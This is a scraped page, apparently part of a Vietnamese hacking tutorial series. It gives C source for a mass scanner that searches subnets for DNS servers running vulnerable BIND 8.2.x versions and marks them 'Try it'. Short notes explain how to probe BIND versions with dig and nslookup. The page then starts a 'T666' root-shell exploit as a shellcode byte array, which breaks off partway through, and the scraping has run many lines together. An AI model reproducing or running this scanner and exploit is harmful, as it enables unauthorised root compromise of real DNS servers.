Hacking Security Sites part 36 pptx

if( (name[0] <= '0') || (name[0] >= '9') )

{

host_entry = gethostbyname( name );

if( host_entry == NULL )

{

if( option[0] != 1 ) {

printf( "Can not scan %s.\n", name );

exit(0);

}

}

if( option[0] != 1 ) {

addr = *((struct in_addr *)host_entry->h_addr);

ip = (unsigned char *)inet_ntoa( addr );

subnet = GetSubnet( ip );

}

}

if( (name[0] >= '0') && (name[0] <= '9') )

{

host_entry = gethostbyaddr( name, strlen(name), AF_INET ); if( host_entry == NULL )

{

if( option[0] != 1 ) {

printf( "Can not scan %s.\n", name );

exit(0);

}

}

if( option[0] != 1 ) {

addr = *((struct in_addr *)host_entry->h_addr);

ip = (unsigned char *)inet_ntoa( addr );

subnet = GetSubnet( ip );

}

}

if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) ) {

Scan( ip );

printf( "Scanning Done.\n" );

remove( R1_DIR );

remove( R2_DIR );

exit(0);

}

if( option[1] == 1 )

{

for( i = 0; i < 256; i++ )

{

if( fork() == 0 )

{

strcpy( subnet, itoa( i ) );

ip_s = ChangeSubnet( ip, subnet ); Scan( ip_s );

remove( R1_DIR );

remove( R2_DIR );

exit(0);

} else {

wait( NULL );

}

continue;

}

printf( "Scanning Done.\n" );

exit(0);

}

if( option[2] == 1 )

{

strcpy( cmd, SCAN_EXE );

strcat( cmd, name );

strcat( cmd, "/24" );

strcat( cmd, " > " );

strcat( cmd, R1_DIR );

chdir( SCAN_DIR );

system( cmd );

strcpy( cmd, "grep \"Interesting\" " ); strcat( cmd, R1_DIR );

strcat( cmd, " > " );

strcat( cmd, R2_DIR );

system( cmd );

if( ( fp = fopen( R2_DIR, "r" ) ) < 0 ) {

printf( "File Open Error!\n" );

exit(0);

}

while( 1 )

{

bzero( name, 200 );

temp = (char *)malloc( 200 );

strcpy( temp, " " );

temp = fgets( temp, 100, fp );

if( temp == NULL ) break;

if( temp[21] == ' ' )

{

for( i = 0; i < 16; i++ )

{

if( (temp[i+23] != ' ') && (temp[i+23] != ')') )

{

if( (temp[i+23] >= '0') && (temp[i+23] <= '9') )

{

name[i] = temp[i+23];

} else {

if( temp[i+23] == '.' )

name[i] = temp[i+23];

}

}

}

}

if( temp[21] != ' ' )

{

for( i = 0; i < 50; i++ )

{

if( temp[i+21] != ' ' ) name[i] = temp[i+21];

}

}

Scan( name );

free(temp);

}

remove( R1_DIR );

remove( R2_DIR );

}

if( option[0] == 1 )

{

printf( "Creator : Laks Bluesky\n" );

printf( "E-mail : <a

href="mailto:lb0gspm@hanmail.net">lb0gspm@hanmail.net</a>\n\n" ); printf( "Version : 2.00 beta\n\n" );

printf( "2000.06.19\n" );

exit(0);

}

}

char *itoa( int i )

{

char *ret;

char c;

int count;

ret = (char *)malloc( 4 );

count = 1;

if( i > 9 ) count = 2; if( i > 99 ) count = 3;

if( count == 1 )

{

c = i+48;

ret[0] = c;

ret[1] = '\0';

return ret;

}

if( count == 2 )

{

c = i / 10;

i = i - (c*10);

ret[0] = c+48;

ret[1] = i+48;

ret[2] = '\0';

return ret;

}

if( count == 3 )

{

c = i / 100;

i = i - (c*100);

ret[0] = c+48;

c = i / 10;

i = i - (c*10);

ret[1] = c+48;

ret[2] = i+48;

ret[3] = '\0';

return ret;

}

}

char *ChangeSubnet( char *ip, char *subnet ) {

char *ip_s;

int count = 0, i = 0;

ip_s = (char *)malloc( 16 );

strcpy( ip_s, ip );

for( count = 0; count != 3; count = count ) {

if( ip_s[i] == '.' )

{

count++;

i++;

continue;

}

i++;

}

ip_s[i++] = subnet[0];

ip_s[i++] = subnet[1];

ip_s[i++] = subnet[2];

ip_s[i++] = subnet[3];

return ip_s;

}

char *GetSubnet( char *ip )

{

char *ret;

int count = 0, i = 0;

ret = (char *)malloc( 4 );

for( count = 0; count != 3; count = count ) {

if( ip[i] == '.' )

{

count++;

i++;

continue;

}

i++;

}

ret[0] = ip[i++];

ret[1] = ip[i++];

ret[2] = ip[i++];

ret[3] = ip[i++];

return ret;

}

int Scan( char *ip )

{

unsigned short int i;

unsigned char c;

unsigned char *cmd;

unsigned char *version;

FILE *fp;

struct stat result;

cmd = (char *)malloc( 200 );

version = (char *)malloc( 9 );

printf( "Scanning %s\n", ip );

strcpy( cmd, "dig @" );

strcat( cmd, ip );

strcat( cmd, " version.bind chaos txt > " ); strcat( cmd, R1_DIR );

strcat( cmd, " 2> /dev/null" );

system( cmd );

strcpy( cmd, "grep \"VERSION.BIND.\" " ); strcat( cmd, R1_DIR );

strcat( cmd, " > " );

strcat( cmd, R2_DIR );

system( cmd );

stat( R2_DIR, &result );

if( result.st_size < 30 )

{

chdir( CBIND_DIR );

return 0;

}

if( ( fp = fopen( R2_DIR, "r" ) ) >= 0 ) {

for( i = 0; i < 29; i++ )

{

c = fgetc( fp );

}

for( i = 0; i < 9; i++ )

{

c = fgetc( fp );

if( c == '"' )

{

version[i] = '\0';

break;

}

version[i] = c;

}

} else {

chdir( CBIND_DIR );

return 0;

}

if( strcmp( version, "8.2" ) == 0 )

{

printf( "%s: IT IS VULNERABLE! ", ip ); printf( "Try it \n" );

chdir( CBIND_DIR );

return 0;

}

if( strcmp( version, "8.2.1" ) == 0 )

{

printf( "%s: IT IS VULNERABLE! ", ip );

printf( "Try it \n" );

chdir( CBIND_DIR );

return 0;

}

if( strcmp( version, "8.2.2" ) == 0 )

{

printf( "%s: IT IS VULNERABLE! ", ip );

printf( "Try it \n" );

chdir( CBIND_DIR );

return 0;

}

if( strcmp( version, "8.2.2-P5" ) == 0 )

{

chdir( CBIND_DIR );

return 0;

}

if( strcmp( version, "8.1.2" ) == 0 )

{

chdir( CBIND_DIR );

return 0;

}

chdir( CBIND_DIR );

return 0;

}

* Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận diện version của BIND

NSLOOKUP

# nslookup

Default Server: ns.yourco.bogus

Address: 333.333.333.333

> set class=chaos> set type=txt

> version.bind

Server: ns.yourco.bogus

Address: 333.333.333.333

VERSION.BIND text = "8.2.2-P5"

>DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>)

dig version.bind txt chaos @<server>hoặc

dig @ txt chaos version.bind

Nếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug "nxt"

Bước 2: lấy root shell bằng T666

#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <signal.h>#include

<time.h>#include <string.h>#include <ctype.h>#include <sys/types.h>#include

<sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>#include

<arpa/nameser.h>#include <netdb.h>

char linuxcode[]=

{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,